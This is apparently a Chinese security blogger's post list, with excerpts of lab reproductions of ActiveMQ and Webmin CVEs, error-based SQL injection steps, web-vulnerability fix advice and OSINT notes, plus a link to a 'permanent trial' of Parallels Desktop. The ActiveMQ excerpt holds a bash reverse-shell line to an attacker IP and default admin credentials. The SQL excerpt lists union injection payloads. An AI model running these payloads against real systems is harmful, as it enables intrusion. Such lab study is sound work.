- 博客(7)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 Parallels Desktop 17 for Mac(pd虚拟机)支持M1系统v17.1.1 (51537)永久试用版
介绍:pd17虚拟机中文版支持Intel 和 Apple M1,也支持支持 macOS Monterey 12!parallels desktop mac 17 可以显著降低磁盘,内存和CPU使用率,在搭载 Apple M1 芯片的 Mac 上的 Parallels Desktop 体验更加强大、更为顺畅!Parallels Desktop 17.1.0支持安装Windows 11 正式版(下载地址见教程)贴个链接(附教程):https://www.macz.com/mac/8157.html?id=
2022-02-22 10:03:20
3321
3
原创 ActiveMQ反序列化漏洞(CVE-2015-5254)复现
ActiveMQ反序列化漏洞(CVE-2015-5254)复现详细过程访问ip:8161/admin默认密码:admin/adminwget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jarkali下载工具并使用mkdir external创建文件夹否则会报错提示不存在文件夹bash -i >& /dev/tcp/192.168.186.129/8888 0>
2021-11-24 11:04:48
3466
原创 sql注入-字符型报错注入
试报错看回显暴字段order by 3union select 1,2,3暴库1,2,database()暴表group_concat(table_name) from information_schema.tables where table_schema =database()或group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+暴列group_conca
2021-11-24 10:32:07
3248
原创 Web常见漏洞及修复建议
目录 1.SQL注入漏洞描述Web程序中对于用户提交的参数未做过滤直接拼接到SQL语句中执行,导致参数中的特殊字符破坏了SQL语句原有逻辑,攻击者可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。修复建议代码层最佳防御sql漏洞方案:使用预编译sql语句查询和绑定变量。(1)使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到S
2021-11-24 10:28:30
1334
原创 Webmin 命令执行漏洞 (CVE-2020-35606)---复现
下载 webmin_pu_escape_bypass_rce.rb (Metasploit) CVE-Mitre 下载链接漏洞简介:该模块利用 Webmin 1.962 及更低版本中的任意命令执行漏洞。 任何授权“包更新”模块的用户都可以使用 root 权限执行任意命令。 它是通过规避针对 CVE-2019-12840 采取的措施而出现的。 s/(-)|(.)/string/g; 逃避不足以预防。 因此,由于包名变量直接放置在系统命令中,我们可以使用一些 HTTP 支持的转义字符对其进行操作。 例如,
2021-11-24 10:16:39
3473
原创 ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现
一、漏洞描述该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问。二、影响版本Apache ActiveMQ 5.0.0 - 5.13.2三、环境搭建1、下载、搭建vulhub2、下载、安装docker服务,使用docker-co
2021-11-23 15:45:22
673
2
原创 信息搜集-极其详细(未完持续补充...)
信息搜集(未完持续补充...)OSINT(外围信息搜集)www.testfire.net(IBM公司为了炫耀APPscan的测试网站) 1、dns和ip挖掘目标信息 1.1、域名注册信息查询 msf>whois <域名&ip> whois 查询时去掉www、ftp等前缀,查不到 1.2、nslookup和dig域名查询 ...
2021-05-14 09:43:27
487
1
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人